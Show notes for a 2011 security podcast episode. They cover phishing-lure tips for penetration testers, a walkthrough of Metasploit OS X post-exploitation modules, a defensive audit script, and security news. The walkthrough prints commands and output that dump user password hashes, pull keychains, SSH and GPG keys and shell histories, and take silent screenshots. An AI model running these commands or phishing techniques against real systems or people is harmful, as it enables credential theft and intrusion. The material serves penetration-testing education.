Episode232
Announcements
PaulDotCom Security Weekly - Episode 232 for Thursday February 24th, 2011.
- Wednesday, March 9th, 2011 at 2pm EST, PaulDotCom will present the Wireless "Security" edition of Cyber Security World's Security Fail Monthly Webcast.
- Be sure to tune in next week for a special guest tech segment by Sharon Conheady and our old friend G W Ray Davidson.
- Paul, Larry, and Darren will be attending the Mid-Atlantic CCDC competition in Columbia, MD from March 10-12, 2011. Larry does badges, Paul will be the "MC", and Darren will serve us beer and coffee. Open to the public, check out the full agenda.
Guest Interview: Mike Murray
Download the Audio (MP3) Version of this segment here!
Mike Murray is a Managing Partner of MAD Security, LLC, where he leads engagements to help corporate and government customers understand and protect their security organization, and is also responsible for the advanced curriculum at The Hacker Academy. Mike is here to convince YOU that the most important system to focus on in information security is the human and organizational system.
Mike’s thoughts on security can be found on his blog while his work on building careers can be found at InfoSecLeaders.com and ConnectedCareer.com.
Guest Interview: Mike Murr
Mike Murr is a computer scientist who specializes in the domain of forensic computing. He writes the Forensic Computing blog and teaches for the SANS Institute.
Tech Segment: Murr and Murray: "The top 5 most overlooked keys to phishing success"
Also, I'll want to post a couple of links to pages that we'll talk about: specifically, the Flesch Grade Level Calculator and the spam check tester.
While we spend epic amounts of time getting our exploits and payloads perfect (even if we’re using SET), far too often we see testers using stock emails or variants of canned emails that they’ve been taught to use without thinking about the real keys to getting their emails read and acted upon. So, in this Pauldotcom episode, I wanted to share my five most-often overlooked secrets to making sure that your email phishing works. On this episode, we're going to cover some quick thoughts on:
- The Subject Line
- The Email Address
- Salutations and Signatures
- Getting Past the Gatekeeper
- Sounding Right - The Flesch Test
Tech Segment: Carlos: "Skinning the Cat, Post Exploitation enumeration on OSX"
On today's tech segment we will cover 2 new enumeration modules against OSX machines that were added to Metasploit. These modules are:
- use post/osx/gather/enum_osx
- use post/osx/gather/hashdump
We will cover the shell commands used by the modules themselves. One of the advantages of post exploitation modules versus the typical Meterpreter script is that they can be written to be used against both shell and Meterpreter sessions. These initial OS X modules are written and tested for shell sessions, but many of the tasks are already written to work for Meterpreter once some issues with the Java Meterpreter are fixed.
Let's start with the OS X Enumeration module. For the demo you will see that we have 2 shell sessions:
    msf exploit(handler) > sessions

    Active sessions
    ===============

      Id  Type       Information  Connection
      --  ----       -----------  ----------
      1   shell osx               192.168.1.100:4446 -> 192.168.1.100:54010
      2   shell osx               192.168.1.100:4446 -> 192.168.1.100:54013
Session 1 is running as a regular user on an OS X Snow Leopard target and Session 2 is running as root on the same box. The enumeration module alters its behavior depending on the privilege level it has on the target box, and also changes the commands it runs depending on the version of OS X it is running against. To select the module we use the use command; after selecting it we can look at the module's info and the options it provides:
    msf exploit(handler) > use post/osx/gather/enum_osx
    msf post(enum_osx) > info

           Name: Mac OS X Information Enumeration
         Module: post/osx/gather/enum_osx
        Version: 11816
       Platform: OSX
           Arch:
           Rank: Normal

    Provided by:
      Carlos Perez <carlos_perez@darkoperator.com>

    Description:
      This module does initial gathering of information from OSX Tiger,
      Leopard and Snow Leopard System

    msf post(enum_osx) > show options

    Module options (post/osx/gather/enum_osx):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION                   yes       The session to run this module on.
To specify a session to run against we just set the SESSION option in the datastore to the number of the session we want to run against:
    msf post(enum_osx) > set SESSION 1
    SESSION => 1
Once we have a session selected, the only thing we need to do is issue the run command:
    msf post(enum_osx) > run

    [*] Running module against loki.local
    [*] Saving all data to /Users/cperez/.msf3/logs/post/enum_osx/loki.local_20110224.0303
    [*] Enumerating Development Tools
    [*] Enumerating Airport
    [*] Enumerating Applications
    [*] Enumerating Ethernet
    [*] Enumerating Bluetooth
    [*] Enumerating Logs
    [*] Enumerating Known Networks
    [*] Enumerating Firewall
    [*] Enumerating USB
    [*] Enumerating OS
    [*] Enumerating Network
    [*] Enumerating StartUp
    [*] Enumerating Printers
    [*] Enumerating Preference Panes
    [*] Enumerating Frameworks
    [*] Enumerating Environment Variables
    [*] Enumerating UDP Connections
    [*] Enumerating TCP Connections
    [*] Enumerating Current Activity
    [*] Enumerating Process List
    [*] Enumerating Last Boottime
    [*] Enumerating Groups
    [*] Enumerating Users
    [*] .ssh Folder is present
    [*] Downloading config
    [*] Downloading id_dsa
    [*] Downloading id_dsa.pub
    [*] Downloading known_hosts
    [*] .gnupg Folder is present
    [*] Downloading gpg.conf
    [*] Downloading pubring.gpg
    [*] Downloading pubring.gpg~
    [*] Downloading random_seed
    [*] Downloading secring.gpg
    [*] Downloading trustdb.gpg
    [*] Capturing screenshot
    [*] Screenshot Captured
    [*] Extracting bash history
    [*] History file .bash_history found for cperez
    [*] Downloading .bash_history
    [*] History file .irb_history found for cperez
    [*] Downloading .irb_history
    [*] History file .scapy_history found for cperez
    [*] Downloading .scapy_history
    [*] History file .sh_history found for cperez
    [*] Downloading .sh_history
    [*] History file .sqlite_history found for cperez
    [*] Downloading .sqlite_history
    [*] Enumerating and Downloading keychains for cperez
    [*] Post module execution completed
    msf post(enum_osx) >
As can be seen, the module gathers a lot of data on the target system, starting with configuration, network connections, account information and the list of processes. Once it has all of that, it checks for .ssh and .gnupg configuration folders and downloads all of their configuration files to the attacker's machine. It then takes a screen capture, followed by enumeration of any history file found in the user's home folder, and downloads those as well. If it is running as root it will extract the SHA1 hashes for the users on the box; if the box is sharing a Samba share or talks to AD it will also extract the NTLM and LM hashes for the users, creating a separate file in john format for each hash type.
Most of the configuration data is gathered using the system_profiler command. It works by specifying a data type that corresponds to the configuration area we want information for; to list the supported data types we run the command with -listDataTypes:
    loki:~ cperez$ system_profiler -listDataTypes
    Available Datatypes:
    SPHardwareDataType
    SPNetworkDataType
    SPSoftwareDataType
    SPParallelATADataType
    SPAudioDataType
    SPBluetoothDataType
    SPCardReaderDataType
    SPDiagnosticsDataType
    SPDiscBurningDataType
    SPEthernetDataType
    SPFibreChannelDataType
    SPFireWireDataType
    SPDisplaysDataType
    SPHardwareRAIDDataType
    SPMemoryDataType
    SPPCIDataType
    SPParallelSCSIDataType
    SPPowerDataType
    SPPrintersDataType
    SPSASDataType
    SPSerialATADataType
    SPUSBDataType
    SPAirPortDataType
    SPFirewallDataType
    SPNetworkLocationDataType
    SPModemDataType
    SPNetworkVolumeDataType
    SPWWANDataType
    SPApplicationsDataType
    SPDeveloperToolsDataType
    SPExtensionsDataType
    SPFontsDataType
    SPFrameworksDataType
    SPLogsDataType
    SPManagedClientDataType
    SPPrefPaneDataType
    SPStartupItemDataType
    SPSyncServicesDataType
    SPUniversalAccessDataType
For network connections the netstat command is used:
• netstat -np tcp
• netstat -np udp
To get environment variables we use:
• printenv
For boot time and current activity, the who command:
• who -b
• who
For processes:
• ps -ea
For enumerating users and groups the command varies per version of the OS. For Leopard and above:
• dscacheutil -q user
• dscacheutil -q group
For Tiger and below:
• lookupd -q user
• lookupd -q group
For the screenshot the following command is used:
• As Root: launchctl bsexec {loginwindow PID} screencapture -x screenshot.jpg
• As User: screencapture -x screenshot.jpg
For history files the following regex is used to match the most common history file names:
• \.\w*\_history
This will match any hidden file with the word history at the end.
For dumping hashes the module must run as root. OS X does not store the credentials in a passwd or master.passwd file, but, much like HP-UX Trusted Mode, in individual files per account. The first thing we need is the GUID of the account; to get it we run:
Leopard and Above:
• dscl localhost -read /Search/Users/{user} | grep GeneratedUID | cut -c15-
Tiger:
• niutil -readprop . /users/{user} generateduid
Now with the GUID we can carve the file with the hashes. The module carves out the SHA1, LM and NTLM hashes:
• SHA1: /bin/cat /var/db/shadow/hash/{guid} | cut -c169-216
• NTLM: /bin/cat /var/db/shadow/hash/{guid} | cut -c1-32
• LM: /bin/cat /var/db/shadow/hash/{guid} | cut -c33-64
The last thing the module does is enumerate all keychain files for the users and download them:
• As User: security list-keychains
• As Root: sudo -u {username} -i /usr/bin/security list-keychains
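Everything in the second half of the module is per-user data that a post-exploitation module picks up from a home directory: the .ssh and .gnupg folders, the keychains, and any history file matching the regex above. The script below is an added example for the defender's side, not code from the episode or from Metasploit: it walks a home directory, lists the artifacts the module would collect, and flags any of them readable by group or others. The artifact list and the anchored history-file pattern are my choices; the Library/Keychains location is assumed from the keychain enumeration described above.

```shell
#!/bin/sh
# Added example (not part of the Metasploit module or the episode): audit a home
# directory for the artifacts that post/osx/gather/enum_osx harvests.

# Mirror the module's history-file pattern \.\w*_history, anchored at both ends so
# that only hidden files ending in _history are reported (one name per line).
find_history_files() {
    home_dir="$1"
    ls -A "$home_dir" 2>/dev/null | grep -E '^\.[A-Za-z0-9_]*_history$' || true
}

# Return 0 (true) when the path is readable by its group or by others.
# Reads the ls permission string so it works on both BSD and GNU userlands.
is_loose() {
    mode=$(ls -ld "$1" | cut -c1-10)
    case "$mode" in
        ????r*|???????r*) return 0 ;;   # 5th char = group read, 8th = other read
    esac
    return 1
}

# Print one line per artifact present under the home directory:
#   "LOOSE <path>" when another account could read it, "OK <path>" otherwise.
# Library/Keychains is an assumed location for the user's keychain files.
audit_home() {
    home_dir="$1"
    for name in .ssh .gnupg Library/Keychains $(find_history_files "$home_dir"); do
        path="$home_dir/$name"
        [ -e "$path" ] || continue
        if is_loose "$path"; then
            echo "LOOSE $path"
        else
            echo "OK $path"
        fi
    done
}

# Number of loose artifacts, printed on stdout (0 when everything is locked down).
count_loose() {
    audit_home "$1" | grep -c '^LOOSE ' || true
}

# Usage: sh audit_home.sh [home directory], defaults to the caller's home.
# Runs only when executed directly, so the functions can also be sourced.
if [ "$(basename "$0")" = "audit_home.sh" ]; then
    target="${1:-$HOME}"
    audit_home "$target"
    echo "loose artifacts: $(count_loose "$target")"
fi
```

The check is deliberately narrow: it only reports permission bits, because that is the one mitigation a user or admin can apply immediately to the files listed above. A mode of 700 on the folders and 600 on the history files and keychains removes the easy read path for a compromised low-privilege account; the root-level hash dump the module also performs is outside the scope of this script.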
Stories For Discussion
Larry's Stories
- In a BIND - [Larry] - Whoops. A DoS condition with certain versions of BIND when performing an IXFR with a specially crafted request causes the DNS server to stop responding. Yuck - we all know how well the intertubes work without DNS…
- Deleting data from Flash drives - [Larry] - This is something that we've known about, since the inception of SSD type storage, however people are just starting to catch on, again. So, why is this the case? The chips themselves reserve an extra 10% for dealing with failures, and it is damned near impossible to access the drive at a level that can either see it, or wipe it. The only way you are getting access to the data is by soldering the chips to a different board that doesn't know about the bad areas…
- Smartphone attacks overdramatized - [Larry] - Holy crap, do I not agree with this article in the least. The general consensus from the article is that, because we can count the number of actual mobile malware infections on one hand, we should take a lackadaisical attitude towards it because: The phones are typically more "closed" making it more difficult to exploit (cough, bullshit, cough), the only way of infiltrating is through an app store (oh sure, every line of code is examined, even through "third party" stores) and Windows is still dominant, versus a plethora of smartphone software and OS versions (I call bullshit here too. Just think about the times you've tried to exploit a box but it was the wrong service pack, language, or point version of an application). Instead of chilling out about it, how about we make the industry BETTER around smartphone security before we end up with a shitstorm of activity…
- Suing Google for being associated with Porn - [Larry] - Man searches his name on Google, and the results come back for him, and some explicit stuff. Now he sues for defamation, because Google associates him with adult content. google-image-search-John-Strand might have a case here. I mean, really, are you that dense…
Paul's Stories
- Bind DNS - The new Internet Kill Switch - [PaulDotCom] - I still maintain that attackers will not take down the Internet, for the most part. So, there are types of attackers that want to do damage, so-called "Hacktivism" groups. However, these tend to be more targeted attacks, such as the DDoS attacks launched by Anonymous against Paypal and other credit card companies. Most of the attackers are out there making big money on the Internet, and can't afford massive outages. Reports are that there is no public exploit, which I never believe. I just believe we haven't seen one in use. I relate it to the Mafia. If you study Mafia history, you know it's tough for a bunch of criminals to get along. They try to avoid a full-scale war within the families because "War is bad for business". Of course, they are criminals, and it happens from time to time, but for the most part it's (criminal) business as usual.
- Corporate Security and "The Gmail Generation" - [PaulDotCom] - A new study has been released reporting that 85 percent of workers under 25 use personal email for work purposes. Now, on one hand, I can see why. A Gmail account is a great thing! It has plenty of storage and you don't get those emails nagging you to clean out your inbox. It's easy to access from anywhere there is a web browser. Mobile access to your email is easy too, several apps make it a cinch to read and respond to emails. The SPAM filtering is awesome. There are typically less restrictive policies on email attachment types and size. Given all those factors, it makes it really tough to provide the same level of service to your employees when it comes to corporate email. Maybe we need to step up the level of service we provide to employees for email, or just move everything to the cloud? Of course, there are grave security risks associated with storing email, and attachments, on public "cloud" services. Is it just me, or have we still not figured out how to implement email encryption that would ease the transition to the email cloud providers doing an awesome job at providing email services to the masses?
- Security Is Frustrating - [PaulDotCom] - And this is why we drink. Dave explores the reasons why people do things like MAC address filtering and hiding their SSID, instead of using strong passwords. We see this happen a lot in the corporate world too, people implement the security that is easy, not what works. Seems to me there needs to be a shift of focus. Let's focus on the hard stuff, like passwords, authentication, physical security, client security, and other stuff that I have probably told people they need to do, but yet we keep marching down the Firewall/IDS/IPS/Anti-Virus route. Dave brings up two more great points: People think they don't have to defend against the best hackers in the world, yet the best hackers in the world create tools that people use. AND he questions why we are doing things backwards, as in using simple passwords but implementing hidden SSIDs and MAC filtering.
- Where's the BEEF? - [PaulDotCom] - The BeEF is now in Ruby. W00t? It has been re-written from the ground up. Now it features a payload for iOS that makes calls via Skype, in the background. HOT! It has all sorts of nasty stuff. This should be in every pen tester's toolkit. No data on your web site? That matters little. If your users visit your web site, fear, fear the BEEF!